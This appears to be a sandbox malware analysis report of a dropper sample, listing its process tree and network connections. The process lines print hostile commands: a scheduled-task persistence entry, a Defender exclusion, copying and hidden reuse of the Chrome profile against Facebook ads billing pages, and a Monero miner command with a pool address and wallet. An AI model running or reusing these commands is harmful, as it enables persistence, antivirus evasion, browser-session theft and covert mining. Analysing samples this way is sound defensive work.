PID 4596 wrote to memory of 4336 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe
PID 4596 wrote to memory of 4336 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe
PID 3252 wrote to memory of 2936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe
PID 3252 wrote to memory of 2936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe
PID 3252 wrote to memory of 2936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe
PID 1408 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe
PID 1408 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe
PID 1408 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe
PID 3788 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe
PID 3788 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe
PID 3788 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe
PID 2972 wrote to memory of 2708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe
PID 2972 wrote to memory of 2708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe
PID 2972 wrote to memory of 2708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe
PID 2724 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2724 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 9aa6e16872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 1710990cbc64.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c862a054a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe

4f5baa1083db067.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe

1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe

08240101651be7e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe

53516815d3135fe3.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe

c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe

9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe

453c5fa76a849.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe

f34b9ab9db6d16.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe

e4b2f18fb52218.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe

08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 396 -ip 396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 564

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe

"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe" -a

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527219 0

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2936 -ip 2936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 356

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\xcopy.exe

xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4f43cc40,0x7ffc4f43cc4c,0x7ffc4f43cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2188,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1776 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2288,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3424,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3548,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3788 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3860,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3972,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5036,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4408 -s 740

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3984,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3496 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4156,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4652,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3476,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3528 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=4132,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3960 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3236,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4268 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=4200,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4eaa46f8,0x7ffc4eaa4708,0x7ffc4eaa4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1968 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 8.8.8.8:53 www.listincode.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 www.maxmind.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 104.17.28.25:80 www.maxmind.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 15.4.26.104.in-addr.arpa udp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 25.28.17.104.in-addr.arpa udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
MD 176.123.2.239:80 176.123.2.239 tcp
N/A 127.0.0.1:55740 tcp
N/A 127.0.0.1:55742 tcp
US 8.8.8.8:53 239.2.123.176.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 secure.facebook.com udp
GB 157.240.214.13:443 secure.facebook.com tcp
GB 157.240.221.35:443 www.facebook.com tcp
GB 157.240.221.35:443 www.facebook.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
GB 157.240.221.35:443 www.facebook.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 13.214.240.157.in-addr.arpa udp
